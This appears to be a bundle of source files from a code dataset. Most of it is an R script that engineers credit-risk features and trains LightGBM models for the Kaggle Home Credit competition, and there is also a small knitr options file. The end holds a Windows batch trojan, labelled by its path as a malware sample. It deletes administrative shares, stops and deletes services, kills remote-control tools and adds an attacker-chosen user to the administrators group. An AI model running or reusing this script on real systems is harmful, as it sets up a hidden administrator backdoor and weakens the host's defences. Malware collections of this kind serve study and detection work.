# qnt <- quantile(dt[,eval(as.name(colname))], probs=c(.25, .75), na.rm = T)
# H <- 1.5 * (qnt[2]-qnt[1])
# dt[eval(as.name(colname)) < (qnt[1] - H), paste0(colname, '_outliers') := -1]
# dt[eval(as.name(colname)) > (qnt[2] + H), paste0(colname, '_outliers') := 1]
# #dt[is.na(eval(as.name(paste0(colname, '_outliers')))), paste0(colname, '_outliers') := 0]
# }
# return(as.data.table(dt))
# }
#
# tr_te = outliers_remove(tr_te, col_from = 3, col_to = col_num)
# gc()
# apply random models
# IMPORTANT! It seems that this approach really works. Check file 2rand_cols...csv
vect_fla = c('y ~ CNT_PAYMENT_max + NAME_CONTRACT_STATUS_sum.y',
'y ~ REGION_RATING_CLIENT_W_CITY + AMT_APPLICATION_mean',
'y ~ DPD_n_distinct + LIVE_REGION_NOT_WORK_REGION + NAME_EDUCATION_TYPE',
'y ~ DAYS_INSTALMENT_min + NAME_INCOME_TYPE + CODE_REJECT_REASON_min',
'y ~ FLAG_DOCUMENT_7 + DAYS_ENTRY_PAYMENT_sd + FLAG_DOCUMENT_3',
'y ~ CREDIT_ACTIVE_BOOL_sum + DAYS_CREDIT_mean'
)
list_params = list(c('CNT_PAYMENT_max', 'NAME_CONTRACT_STATUS_sum.y'),
c('REGION_RATING_CLIENT_W_CITY', 'AMT_APPLICATION_mean'),
c('DPD_n_distinct', 'LIVE_REGION_NOT_WORK_REGION', 'NAME_EDUCATION_TYPE'),
c('DAYS_INSTALMENT_min', 'NAME_INCOME_TYPE', 'CODE_REJECT_REASON_min'),
c('FLAG_DOCUMENT_7', 'DAYS_ENTRY_PAYMENT_sd', 'FLAG_DOCUMENT_3'),
c('CREDIT_ACTIVE_BOOL_sum', 'DAYS_CREDIT_mean')
)
for (i in 1:length(vect_fla)) {
fla = vect_fla[i]
params = list_params[[i]]
# apply model
dt_mod = as.data.table(cbind(y, tr_te[1:length(y), params, with = FALSE]))
mod = lm(data=dt_mod, formula=as.formula(fla)) #to do: add random model here
tr_te[, paste0('newcol','_', sub('y ~ ', '', fla)) := predict(mod, tr_te[, params, with = FALSE])]
}
rm(fla, params, vect_fla, list_params, dt_mod, mod); gc()
# create matrix from dt without RAM issues
# original article with the method could be found here:
# https://medium.com/data-design/loading-super-large-sparse-data-when-you-cant-load-as-sparse-in-r-2a9f0ad927b2
temp_names = colnames(tr_te)
write_csv(as.data.frame(temp_names), path = paste0(data_dir, "//Calculation//input_colnames.csv"), col_names = TRUE)
write_csv(tr_te, path = paste0(data_dir, "//Calculation//input_bigmatrix.csv"), col_names = TRUE)
temp_names = read.csv(file = paste0(data_dir, "//Calculation//input_colnames.csv"))
rm(tr_te); gc()
n = 10 #set number of parts to split
for (i in 1:n) {
cat("Loading ", i, "th part.\n", sep = "")
train_data_temp <- fread(input = paste0(data_dir, "//Calculation//input_bigmatrix.csv"),
select = (1+round((i-1)*nrow(temp_names)/n, 0)):round(i*nrow(temp_names)/n, 0),
header = TRUE,
sep = ",",
stringsAsFactors = FALSE,
colClasses = rep("numeric", nrow(temp_names)),
data.table = TRUE)
gc(verbose = FALSE)
if (i > 1) {
cat("Coercing to matrix.\n", sep = "")
tr_te_temp <- as.matrix(train_data_temp)
rm(train_data_temp)
gc(verbose = FALSE)
cat("Coercing into dgCMatrix with NA as blank.\n", sep = "")
tr_te_temp <- dropNA(tr_te_temp)
gc(verbose = FALSE)
cat("Column binding the full matrix with the newly created matrix.\n", sep = "")
tr_te <- cbind(tr_te, tr_te_temp)
rm(tr_te_temp)
gc(verbose = FALSE)
} else {
cat("Coercing to matrix.\n", sep = "")
tr_te_temp <- as.matrix(train_data_temp)
rm(train_data_temp)
gc(verbose = FALSE)
cat("Coercing into dgCMatrix with NA as blank.\n", sep = "")
tr_te <- dropNA(tr_te_temp)
gc(verbose = FALSE)
}
}
gc()
#---------------------------
cat("Save & load long dataset...\n")
saveRDS(tr_te, file = paste0(data_dir, "//Calculation//input_bigmatrix_long.rds"))
#---------------------------
lgbm_feat = data.table(Feature = character(), Gain = numeric(), Cover = numeric(), Frequency = numeric())
lgbm_pred_list = list()
cat("Preparing data...\n")
for (i in 1:5) {
tr_te = readRDS(paste0(data_dir, "//Calculation//input_bigmatrix_long.rds"))
load(file = paste0(data_dir, "//Calculation//input_tri.RData"), .GlobalEnv)
load(file = paste0(data_dir, "//Calculation//input_y.RData"), .GlobalEnv)
#dtest <- lgb.Dataset(data = tr_te[-tri, ]) #it seems that this approach do not work for LightGBM. Raise questions for this.
dtest <- tr_te[-tri, ]
tr_te <- tr_te[tri, ]
tri <- caret::createDataPartition(y, p = 0.9, list = F) %>% c()
dtrain = lgb.Dataset(data = tr_te[tri, ], label = y[tri])
dval = lgb.Dataset(data = tr_te[-tri, ], label = y[-tri])
cols <- colnames(tr_te)
rm(tr_te, y, tri); gc()
#---------------------------
cat("Training model...\n")
# parameters taken from https://www.kaggle.com/dromosys/fork-of-fork-lightgbm-with-simple-features-cee847/code
#lgb.grid = list(objective = "binary",
# metric = "auc",
# #n_estimators=10000,
# learning_rate=0.02, # in source - 0.02
# num_leaves=32,
# colsample_bytree=0.9497036,
# subsample=0.8715623,
# max_depth=8,
# reg_alpha=0.04,
# reg_lambda=0.073,
# min_split_gain=0.0222415,
# min_child_weight=40,
# is_unbalance = TRUE)
lgb.grid = list(objective = "binary",
metric = "auc",
learning_rate=0.02, # in source - 0.02
num_leaves=127,
#colsample_bytree=0.9497036,
#subsample=0.8715623,
#max_depth=8,
#reg_alpha=0.04,
#reg_lambda=0.073,
#min_split_gain=0.0222415,
#min_child_weight=40,
feature_fraction = 0.6, #originaly 0.5
bagging_freq = 1,
bagging_fraction = 0.8,
use_missing = TRUE,
is_unbalance = TRUE)
m_gbm_cv = lgb.train(params = lgb.grid,
data = dtrain,
num_threads = 10,
nrounds = 5,
eval_freq = 20,
#boosting = 'dart', # todo: check the difference
#num_leaves = 255, # typical: 255, usually {15, 31, 63, 127, 255, 511, 1023, 2047, 4095}.
#eval = "binary_error", #can place own validation function here #unknown parameter
#categorical_feature = categoricals.vec,
num_iterations = 2000, #2000, equivalent of n_estimators
early_stopping_round = 200,
valids = list(train = dval),
#nfold = 5, #unknown parameter
#stratified = TRUE, #unknown parameter
verbose = 2)
lgbm_pred_list[[i]] = predict(m_gbm_cv, dtest)
lgbm_feat = rbindlist(list(lgbm_feat, lgb.importance(m_gbm_cv, percentage = TRUE)))
}
avg_lgbm = Reduce(`+`, lgbm_pred_list)
avg_lgbm = avg_lgbm/i
lgbm_feat_avg = lgbm_feat %>% group_by(Feature) %>%
summarize(gain_avg = mean(Gain),
cover_avg = mean(Cover),
frequency_avg = mean(Frequency))
#---------------------------
read_csv(file.path(data_dir, "//Models//sample_submission.csv")) %>%
mutate(SK_ID_CURR = as.integer(SK_ID_CURR),
TARGET = avg_lgbm) %>%
write_csv(file.path(data_dir, paste0("//Models//new_mod_", round(m_gbm_cv$best_score, 5), ".csv")))
# write file with characteristic parameters
write_csv(lgbm_feat_avg, file.path(data_dir, paste0("//Results//new_mod_", round(m_gbm_cv$best_score, 5), "_importance.csv")))
| /homecredit/LightGBM_new.R | no_license | Eovil246O1/R | R | false | false | 18,764 | r | library(magrittr)
library(lightgbm)
library(moments)
library(data.table)
library(recommenderlab)
library(tidyverse)
#---------------------------
cat("Loading data...\n")
data_dir = "C:\\Users\\Viacheslav_Pyrohov\\Desktop\\Kaggle_Homecredit competition"
tr <- read_csv(file.path(data_dir, "application_train.csv"))
te <- read_csv(file.path(data_dir, "application_test.csv"))
#---------------------------
cat("Preprocessing...\n")
fn <- funs(mean, sd, min, max, sum, n_distinct, .args = list(na.rm = TRUE))
time_coef = log(0.5)/(-24) #apply weight coefficient to historical data, coef = 0.5 weight for 24 month ago
#---------------------------
cat("Preprocessing bureau_balance.csv...\n")
bbalance <- read_csv(file.path(data_dir, "bureau_balance.csv"))
# IMPORTANT! This part has low gain at the moment - check showed that old algorythm gave sum gain of 0.03234, new - 0.0457
sum_bbalance <- bbalance %>%
#to improve: treat warnings
#to do: delete redundant variables
#to do: to make sure that new approach works validate against the same number of features!
filter(!STATUS %in% 'X') %>% #filter out STATUS == 'X' as this mean absense of data
mutate(STATUS = if_else(STATUS == 'C', -1, as.numeric(STATUS)), #treat 'C' = closed as -1 #this returns warning, but the result is OK and validated
STATUS_WEIGHTED = exp(time_coef*(MONTHS_BALANCE))*STATUS) %>%
group_by(SK_ID_BUREAU) %>%
mutate(START_STATUS = first(STATUS, MONTHS_BALANCE),
END_STATUS = last(STATUS, MONTHS_BALANCE)) %>%
summarise_all(fn)
rm(bbalance); gc()
# old approach
# sum_bbalance <- bbalance %>%
# mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
# group_by(SK_ID_BUREAU) %>%
# summarise_all(fn)
# rm(bbalance); gc()
#---------------------------
cat("Preprocessing bureau.csv...\n")
bureau <- read_csv(file.path(data_dir, "bureau.csv"))
bureau <- bureau %>% #to do: validate if this approach gives gain
mutate(CREDIT_ACTIVE_BOOL = if_else(CREDIT_ACTIVE == 'Active', 1, 0),
CREDIT_CLOSED_BOOL = if_else(CREDIT_ACTIVE == 'Closed', 1, 0),
CREDIT_SOLD_BOOL = if_else(CREDIT_ACTIVE %in% c('Sold','Bad debt'), 1, 0),
CREDIT_UNTYPICAL_CURRENCY = if_else(CREDIT_CURRENCY != 'currency 1', 1, 0)) %>% #old approach could be better - check
select(-c(CREDIT_ACTIVE, CREDIT_CURRENCY))
# table(sum_bureau_test$CREDIT_CURRENCY) #currently continue working on bureau data
sum_bureau <- bureau %>%
left_join(sum_bbalance, by = "SK_ID_BUREAU") %>%
select(-SK_ID_BUREAU) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
rm(bureau, sum_bbalance); gc()
#---------------------------
cat("Preprocessing credit_card_balance.csv...\n")
cc_balance <- read_csv(file.path(data_dir, "credit_card_balance.csv"))
sum_cc_balance <- cc_balance %>%
select(-SK_ID_PREV) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
agr_prev_cc_balance <- cc_balance %>%
select(-SK_ID_CURR) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_PREV) %>%
summarise_all(funs(mean(., na.rm = TRUE)))
rm(cc_balance); gc()
#---------------------------
cat("Preprocessing installments_payments.csv...\n")
payments <- read_csv(file.path(data_dir, "installments_payments.csv"))
sum_payments <- payments %>%
select(-SK_ID_PREV) %>%
mutate(PAYMENT_PERC = AMT_PAYMENT / AMT_INSTALMENT,
PAYMENT_DIFF = AMT_INSTALMENT - AMT_PAYMENT,
DPD = DAYS_ENTRY_PAYMENT - DAYS_INSTALMENT,
DBD = DAYS_INSTALMENT - DAYS_ENTRY_PAYMENT,
DPD = ifelse(DPD > 0, DPD, 0),
DBD = ifelse(DBD > 0, DBD, 0)) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
agr_prev_payments <- payments %>%
select(-SK_ID_CURR) %>%
mutate(PAYMENT_PERC = AMT_PAYMENT / AMT_INSTALMENT,
PAYMENT_DIFF = AMT_INSTALMENT - AMT_PAYMENT,
DPD = DAYS_ENTRY_PAYMENT - DAYS_INSTALMENT,
DBD = DAYS_INSTALMENT - DAYS_ENTRY_PAYMENT,
DPD = ifelse(DPD > 0, DPD, 0),
DBD = ifelse(DBD > 0, DBD, 0)) %>%
group_by(SK_ID_PREV) %>%
summarise_all(funs(mean(., na.rm = TRUE)))
rm(payments); gc()
#---------------------------
cat("Preprocessing POS_CASH_balance.csv...\n")
pc_balance <- read_csv(file.path(data_dir, "POS_CASH_balance.csv"))
sum_pc_balance <- pc_balance %>%
select(-SK_ID_PREV) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
agr_prev_pc_balance <- pc_balance %>%
select(-SK_ID_CURR) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_PREV) %>%
summarise_all(funs(mean(., na.rm = TRUE)))
rm(pc_balance); gc()
#---------------------------
cat("Preprocessing previous_application.csv...\n")
prev <- read_csv(file.path(data_dir, "previous_application.csv"))
sum_prev <- prev %>%
#left_join(agr_prev_cc_balance, by = "SK_ID_PREV") %>% #to do: check if gives gain
#left_join(agr_prev_payments, by = "SK_ID_PREV") %>% #to do: check if gives gain
#left_join(agr_prev_pc_balance, by = "SK_ID_PREV") %>% #to do: check if gives gain
select(-SK_ID_PREV) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
mutate(DAYS_FIRST_DRAWING = ifelse(DAYS_FIRST_DRAWING == 365243, NA, DAYS_FIRST_DRAWING),
DAYS_FIRST_DUE = ifelse(DAYS_FIRST_DUE == 365243, NA, DAYS_FIRST_DUE),
DAYS_LAST_DUE_1ST_VERSION = ifelse(DAYS_LAST_DUE_1ST_VERSION == 365243, NA, DAYS_LAST_DUE_1ST_VERSION),
DAYS_LAST_DUE = ifelse(DAYS_LAST_DUE == 365243, NA, DAYS_LAST_DUE),
DAYS_TERMINATION = ifelse(DAYS_TERMINATION == 365243, NA, DAYS_TERMINATION),
APP_CREDIT_PERC = AMT_APPLICATION / AMT_CREDIT) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
rm(prev, agr_prev_cc_balance, agr_prev_payments, agr_prev_pc_balance); gc()
tri <- 1:nrow(tr)
y <- tr$TARGET
tr_te <- tr %>%
select(-TARGET) %>%
bind_rows(te) %>%
left_join(sum_bureau, by = "SK_ID_CURR") %>%
left_join(sum_cc_balance, by = "SK_ID_CURR") %>%
left_join(sum_payments, by = "SK_ID_CURR") %>%
left_join(sum_pc_balance, by = "SK_ID_CURR") %>%
left_join(sum_prev, by = "SK_ID_CURR") %>%
select(-SK_ID_CURR) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
mutate(na = apply(., 1, function(x) sum(is.na(x))),
DAYS_EMPLOYED = ifelse(DAYS_EMPLOYED == 365243, NA, DAYS_EMPLOYED),
DAYS_EMPLOYED_PERC = sqrt(DAYS_EMPLOYED / DAYS_BIRTH),
INCOME_CREDIT_PERC = AMT_INCOME_TOTAL / AMT_CREDIT,
INCOME_PER_PERSON = log1p(AMT_INCOME_TOTAL / CNT_FAM_MEMBERS),
ANNUITY_INCOME_PERC = sqrt(AMT_ANNUITY / (1 + AMT_INCOME_TOTAL)),
LOAN_INCOME_RATIO = AMT_CREDIT / AMT_INCOME_TOTAL,
ANNUITY_LENGTH = AMT_CREDIT / AMT_ANNUITY,
CHILDREN_RATIO = CNT_CHILDREN / CNT_FAM_MEMBERS,
CREDIT_TO_GOODS_RATIO = AMT_CREDIT / AMT_GOODS_PRICE,
INC_PER_CHLD = AMT_INCOME_TOTAL / (1 + CNT_CHILDREN),
SOURCES_PROD = EXT_SOURCE_1 * EXT_SOURCE_2 * EXT_SOURCE_3,
CAR_TO_BIRTH_RATIO = OWN_CAR_AGE / DAYS_BIRTH,
CAR_TO_EMPLOY_RATIO = OWN_CAR_AGE / DAYS_EMPLOYED,
PHONE_TO_BIRTH_RATIO = DAYS_LAST_PHONE_CHANGE / DAYS_BIRTH,
PHONE_TO_EMPLOY_RATIO = DAYS_LAST_PHONE_CHANGE / DAYS_EMPLOYED
# add features from corr check loop
#AMT_DRAWINGS_OTHER_CURRENT_mean + DAYS_LAST_DUE_mean, # new corr = 0.086, diff = 0.059 #inefficient = 3.64E-04 on real data
#DAYS_LAST_DUE_mean + AMT_DRAWINGS_OTHER_CURRENT_sd, # new corr = 0.0856, diff = 0.0586 #inefficient = 4E-04 on real data
#CNT_DRAWINGS_OTHER_CURRENT_mean + CNT_INSTALMENT_MATURE_CUM_mean, # new corr = -0.084, diff = 0.0555 #inefficient = 1.66E-04 on real data
#AMT_PAYMENT_CURRENT_mean + DAYS_LAST_DUE_mean, # new corr = 0.08, diff = 0.05385 #inefficient = 0.00036 on real data
#AMT_CREDIT_SUM_max + RATE_INTEREST_PRIMARY_sd, # new corr = 0.31, check this carefully #inefficient on real data
#AMT_ANNUITY_min.y + RATE_INTEREST_PRIVILEGED_sd, # new corr = 0.13, check this carefully #inefficient on real data
#RATE_INTEREST_PRIMARY_NA = if_else(is.na(RATE_INTEREST_PRIMARY_mean) | is.nan(RATE_INTEREST_PRIMARY_mean), 0, 1), #added by intuition #inefficient on real data
#RATE_INTEREST_PRIVILEGED_NA = if_else(is.na(RATE_INTEREST_PRIVILEGED_mean) | is.nan(RATE_INTEREST_PRIVILEGED_mean), 0, 1) #added by intuition #inefficient on real data
) %>%
select(-one_of(drop_cols))
docs <- str_subset(names(tr), "FLAG_DOC")
live <- str_subset(names(tr), "(?!NFLAG_)(?!FLAG_DOC)(?!_FLAG_)FLAG_")
inc_by_org <- tr_te %>%
group_by(ORGANIZATION_TYPE) %>%
summarise(m = median(AMT_INCOME_TOTAL)) %$%
setNames(as.list(m), ORGANIZATION_TYPE)
rm(tr, te, fn, sum_bureau, sum_cc_balance,
sum_payments, sum_pc_balance, sum_prev); gc()
tr_te %<>%
mutate(DOC_IND_KURT = apply(tr_te[, docs], 1, moments::kurtosis),
LIVE_IND_SUM = apply(tr_te[, live], 1, sum),
NEW_INC_BY_ORG = dplyr::recode(tr_te$ORGANIZATION_TYPE, !!!inc_by_org),
NEW_EXT_SOURCES_MEAN = apply(tr_te[, c("EXT_SOURCE_1", "EXT_SOURCE_2", "EXT_SOURCE_3")], 1, mean),
NEW_SCORES_STD = apply(tr_te[, c("EXT_SOURCE_1", "EXT_SOURCE_2", "EXT_SOURCE_3")], 1, sd))%>%
mutate_all(funs(ifelse(is.nan(.), NA, .))) %>%
mutate_all(funs(ifelse(is.infinite(.), NA, .))) %>%
data.matrix()
#---------------------------
cat("Save & load dataset...\n")
save(tr_te, file = paste0(data_dir, "//Calculation//input_bigmatrix_short.RData"), version = NULL)
save(tri, file = paste0(data_dir, "//Calculation//input_tri.RData"), version = NULL)
save(y, file = paste0(data_dir, "//Calculation//input_y.RData"), version = NULL)
#load(file = paste0(data_dir, "//Calculation//input_bigmatrix_short.RData"), .GlobalEnv)
#load(file = paste0(data_dir, "//Calculation//input_tri.RData"), .GlobalEnv)
#load(file = paste0(data_dir, "//Calculation//input_y.RData"), .GlobalEnv)
gc()
#---------------------------
cat("Create additional variables...\n")
tr_te = as.data.table(tr_te); gc()
#
# # create vars for NaN observations
# # CONCLUSION: NAs already treated by na feature which is enough predicative
# #col_num = ncol(tr_te)
# #for (i in 3:col_num) {
# # colname = names(tr_te)[i]
# # tr_te[is.na(eval(as.name(colname)))|is.nan(eval(as.name(colname)))|is.null(eval(as.name(colname)))|is.infinite(eval(as.name(colname))),
# # paste0(colname, '_nulls') := 1]
# # #tr_te[is.na(eval(as.name(paste0(colname, '_nulls')))), paste0(colname, '_nulls') := 0]
# #}
#
# # outliers marking
# outliers_remove = function(dt,col_from,col_to) {
# for (i in col_from:col_to) {
# colname = names(dt)[i]
# qnt <- quantile(dt[,eval(as.name(colname))], probs=c(.25, .75), na.rm = T)
# H <- 1.5 * (qnt[2]-qnt[1])
# dt[eval(as.name(colname)) < (qnt[1] - H), paste0(colname, '_outliers') := -1]
# dt[eval(as.name(colname)) > (qnt[2] + H), paste0(colname, '_outliers') := 1]
# #dt[is.na(eval(as.name(paste0(colname, '_outliers')))), paste0(colname, '_outliers') := 0]
# }
# return(as.data.table(dt))
# }
#
# tr_te = outliers_remove(tr_te, col_from = 3, col_to = col_num)
# gc()
# apply random models
# IMPORTANT! It seems that this approach really works. Check file 2rand_cols...csv
vect_fla = c('y ~ CNT_PAYMENT_max + NAME_CONTRACT_STATUS_sum.y',
'y ~ REGION_RATING_CLIENT_W_CITY + AMT_APPLICATION_mean',
'y ~ DPD_n_distinct + LIVE_REGION_NOT_WORK_REGION + NAME_EDUCATION_TYPE',
'y ~ DAYS_INSTALMENT_min + NAME_INCOME_TYPE + CODE_REJECT_REASON_min',
'y ~ FLAG_DOCUMENT_7 + DAYS_ENTRY_PAYMENT_sd + FLAG_DOCUMENT_3',
'y ~ CREDIT_ACTIVE_BOOL_sum + DAYS_CREDIT_mean'
)
list_params = list(c('CNT_PAYMENT_max', 'NAME_CONTRACT_STATUS_sum.y'),
c('REGION_RATING_CLIENT_W_CITY', 'AMT_APPLICATION_mean'),
c('DPD_n_distinct', 'LIVE_REGION_NOT_WORK_REGION', 'NAME_EDUCATION_TYPE'),
c('DAYS_INSTALMENT_min', 'NAME_INCOME_TYPE', 'CODE_REJECT_REASON_min'),
c('FLAG_DOCUMENT_7', 'DAYS_ENTRY_PAYMENT_sd', 'FLAG_DOCUMENT_3'),
c('CREDIT_ACTIVE_BOOL_sum', 'DAYS_CREDIT_mean')
)
for (i in 1:length(vect_fla)) {
fla = vect_fla[i]
params = list_params[[i]]
# apply model
dt_mod = as.data.table(cbind(y, tr_te[1:length(y), params, with = FALSE]))
mod = lm(data=dt_mod, formula=as.formula(fla)) #to do: add random model here
tr_te[, paste0('newcol','_', sub('y ~ ', '', fla)) := predict(mod, tr_te[, params, with = FALSE])]
}
rm(fla, params, vect_fla, list_params, dt_mod, mod); gc()
# create matrix from dt without RAM issues
# original article with the method could be found here:
# https://medium.com/data-design/loading-super-large-sparse-data-when-you-cant-load-as-sparse-in-r-2a9f0ad927b2
temp_names = colnames(tr_te)
write_csv(as.data.frame(temp_names), path = paste0(data_dir, "//Calculation//input_colnames.csv"), col_names = TRUE)
write_csv(tr_te, path = paste0(data_dir, "//Calculation//input_bigmatrix.csv"), col_names = TRUE)
temp_names = read.csv(file = paste0(data_dir, "//Calculation//input_colnames.csv"))
rm(tr_te); gc()
n = 10 #set number of parts to split
for (i in 1:n) {
cat("Loading ", i, "th part.\n", sep = "")
train_data_temp <- fread(input = paste0(data_dir, "//Calculation//input_bigmatrix.csv"),
select = (1+round((i-1)*nrow(temp_names)/n, 0)):round(i*nrow(temp_names)/n, 0),
header = TRUE,
sep = ",",
stringsAsFactors = FALSE,
colClasses = rep("numeric", nrow(temp_names)),
data.table = TRUE)
gc(verbose = FALSE)
if (i > 1) {
cat("Coercing to matrix.\n", sep = "")
tr_te_temp <- as.matrix(train_data_temp)
rm(train_data_temp)
gc(verbose = FALSE)
cat("Coercing into dgCMatrix with NA as blank.\n", sep = "")
tr_te_temp <- dropNA(tr_te_temp)
gc(verbose = FALSE)
cat("Column binding the full matrix with the newly created matrix.\n", sep = "")
tr_te <- cbind(tr_te, tr_te_temp)
rm(tr_te_temp)
gc(verbose = FALSE)
} else {
cat("Coercing to matrix.\n", sep = "")
tr_te_temp <- as.matrix(train_data_temp)
rm(train_data_temp)
gc(verbose = FALSE)
cat("Coercing into dgCMatrix with NA as blank.\n", sep = "")
tr_te <- dropNA(tr_te_temp)
gc(verbose = FALSE)
}
}
gc()
#---------------------------
cat("Save & load long dataset...\n")
saveRDS(tr_te, file = paste0(data_dir, "//Calculation//input_bigmatrix_long.rds"))
#---------------------------
lgbm_feat = data.table(Feature = character(), Gain = numeric(), Cover = numeric(), Frequency = numeric())
lgbm_pred_list = list()
cat("Preparing data...\n")
for (i in 1:5) {
tr_te = readRDS(paste0(data_dir, "//Calculation//input_bigmatrix_long.rds"))
load(file = paste0(data_dir, "//Calculation//input_tri.RData"), .GlobalEnv)
load(file = paste0(data_dir, "//Calculation//input_y.RData"), .GlobalEnv)
#dtest <- lgb.Dataset(data = tr_te[-tri, ]) #it seems that this approach do not work for LightGBM. Raise questions for this.
dtest <- tr_te[-tri, ]
tr_te <- tr_te[tri, ]
tri <- caret::createDataPartition(y, p = 0.9, list = F) %>% c()
dtrain = lgb.Dataset(data = tr_te[tri, ], label = y[tri])
dval = lgb.Dataset(data = tr_te[-tri, ], label = y[-tri])
cols <- colnames(tr_te)
rm(tr_te, y, tri); gc()
#---------------------------
cat("Training model...\n")
# parameters taken from https://www.kaggle.com/dromosys/fork-of-fork-lightgbm-with-simple-features-cee847/code
#lgb.grid = list(objective = "binary",
# metric = "auc",
# #n_estimators=10000,
# learning_rate=0.02, # in source - 0.02
# num_leaves=32,
# colsample_bytree=0.9497036,
# subsample=0.8715623,
# max_depth=8,
# reg_alpha=0.04,
# reg_lambda=0.073,
# min_split_gain=0.0222415,
# min_child_weight=40,
# is_unbalance = TRUE)
lgb.grid = list(objective = "binary",
metric = "auc",
learning_rate=0.02, # in source - 0.02
num_leaves=127,
#colsample_bytree=0.9497036,
#subsample=0.8715623,
#max_depth=8,
#reg_alpha=0.04,
#reg_lambda=0.073,
#min_split_gain=0.0222415,
#min_child_weight=40,
feature_fraction = 0.6, #originaly 0.5
bagging_freq = 1,
bagging_fraction = 0.8,
use_missing = TRUE,
is_unbalance = TRUE)
m_gbm_cv = lgb.train(params = lgb.grid,
data = dtrain,
num_threads = 10,
nrounds = 5,
eval_freq = 20,
#boosting = 'dart', # todo: check the difference
#num_leaves = 255, # typical: 255, usually {15, 31, 63, 127, 255, 511, 1023, 2047, 4095}.
#eval = "binary_error", #can place own validation function here #unknown parameter
#categorical_feature = categoricals.vec,
num_iterations = 2000, #2000, equivalent of n_estimators
early_stopping_round = 200,
valids = list(train = dval),
#nfold = 5, #unknown parameter
#stratified = TRUE, #unknown parameter
verbose = 2)
lgbm_pred_list[[i]] = predict(m_gbm_cv, dtest)
lgbm_feat = rbindlist(list(lgbm_feat, lgb.importance(m_gbm_cv, percentage = TRUE)))
}
avg_lgbm = Reduce(`+`, lgbm_pred_list)
avg_lgbm = avg_lgbm/i
lgbm_feat_avg = lgbm_feat %>% group_by(Feature) %>%
summarize(gain_avg = mean(Gain),
cover_avg = mean(Cover),
frequency_avg = mean(Frequency))
#---------------------------
read_csv(file.path(data_dir, "//Models//sample_submission.csv")) %>%
mutate(SK_ID_CURR = as.integer(SK_ID_CURR),
TARGET = avg_lgbm) %>%
write_csv(file.path(data_dir, paste0("//Models//new_mod_", round(m_gbm_cv$best_score, 5), ".csv")))
# write file with characteristic parameters
write_csv(lgbm_feat_avg, file.path(data_dir, paste0("//Results//new_mod_", round(m_gbm_cv$best_score, 5), "_importance.csv")))
|
knitr::opts_chunk$set(
echo = FALSE,
error = FALSE,
fig.align = "center",
fig.path = paste0("figures/", DOCNAME, "/"),
fig.width = 10,
fig.height = 8,
message = FALSE,
warning = FALSE
)
| /R/knitr-options.R | permissive | lazappi/twitter-stats | R | false | false | 239 | r | knitr::opts_chunk$set(
echo = FALSE,
error = FALSE,
fig.align = "center",
fig.path = paste0("figures/", DOCNAME, "/"),
fig.width = 10,
fig.height = 8,
message = FALSE,
warning = FALSE
)
|
net share A$ /delete /y
net share B$ /delete /y
net share C$ /delete /y
net share D$ /delete /y
net share E$ /delete /y
net share F$ /delete /y
net share G$ /delete /y
net share H$ /delete /y
net share I$ /delete /y
net share J$ /delete /y
net share K$ /delete /y
net share K$ /delete /y
net share L$ /delete /y
net share M$ /delete /y
net share N$ /delete /y
net share O$ /delete /y
net share P$ /delete /y
net share Q$ /delete /y
net share R$ /delete /y
net share S$ /delete /y
net share T$ /delete /y
net share U$ /delete /y
net share V$ /delete /y
net share W$ /delete /y
net share X$ /delete /y
net share Y$ /delete /y
net share Z$ /delete /y
net share ADMIN$ /delete /y
net share IPC$ /delete /y
net share /delete ADMIN$
net share /delete IPC$
net stop "Remote Registry Service"
net stop "Computer Browser"
net stop "server" >> server.txt
net stop "REMOTE PROCEDURE CALL"
net stop "REMOTE PROCEDURE CALL SERVICE"
net stop "Remote Access Connection Manager"
net stop "DameWare Mini Control"
net stop "telnet"
net stop "psexecv"
net stop "messenger"
net stop "netbios"
net stop netbios
kill dntu.exe
kill dntu26.exe
kill dwrcs.exe
sc stop systemnt
sc delete systemnt
sc stop ab
sc delete ab
sc stop evente
sc delete evente
sc stop ntsys
sc delete ntsys
sc stop startdll
sc delete startdll
sc stop MSVC5
sc delete MSVC5
sc stop QOS
sc delete QOS
sc stop MMTASK
sc delete MMTASK
sc stop radmm
sc delete radmm
sc stop mstsk64
sc delete mstsk64
sc stop netsecure
sc delete netsecure
sc stop svcserv
sc delete svcserv
sc stop Slave
sc delete Slave
sc stop svcirof
sc delete svcirof
sc stop csrsss
sc delete csrsss
sc stop keyboard
sc delete keyboard
sc stop shell32
sc delete shell32
sc stop csrss2
sc delete csrss2
sc stop evente
sc delete evente
sc stop eventer
sc delete eventer
sc stop event
sc delete event
sc stop event2
sc delete event2
sc stop systemnt
sc delete systemnt
sc stop dll32
sc delete dll32
sc stop rcmd
sc delete rcmd
sc stop sysmgmt
sc delete sysmgmt
sc stop system
sc delete system
sc stop r_server
sc delete r_server
sc stop radmm
sc delete radmm
sc stop ftp
sc delete ftp
sc stop ir
sc delete ir
sc stop identd
sc delete identd
sc stop net33
sc delete net32
sc stop DWMRCS
sc delete DWMRCS
sc stop svchost
sc delete svchost
sc stop slimftpd
sc delete slimftpd
net user /delete mShelp
REM###
net user /add %1 %2
REM###
net localgroup administrators %1 /add
REM###
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp
del %SystemRoot%\system32\login.cmd
| /Bat/Trojan.BAT.NoShare.r | permissive | TheWover/Family | R | false | false | 2,724 | r | net share A$ /delete /y
net share B$ /delete /y
net share C$ /delete /y
net share D$ /delete /y
net share E$ /delete /y
net share F$ /delete /y
net share G$ /delete /y
net share H$ /delete /y
net share I$ /delete /y
net share J$ /delete /y
net share K$ /delete /y
net share K$ /delete /y
net share L$ /delete /y
net share M$ /delete /y
net share N$ /delete /y
net share O$ /delete /y
net share P$ /delete /y
net share Q$ /delete /y
net share R$ /delete /y
net share S$ /delete /y
net share T$ /delete /y
net share U$ /delete /y
net share V$ /delete /y
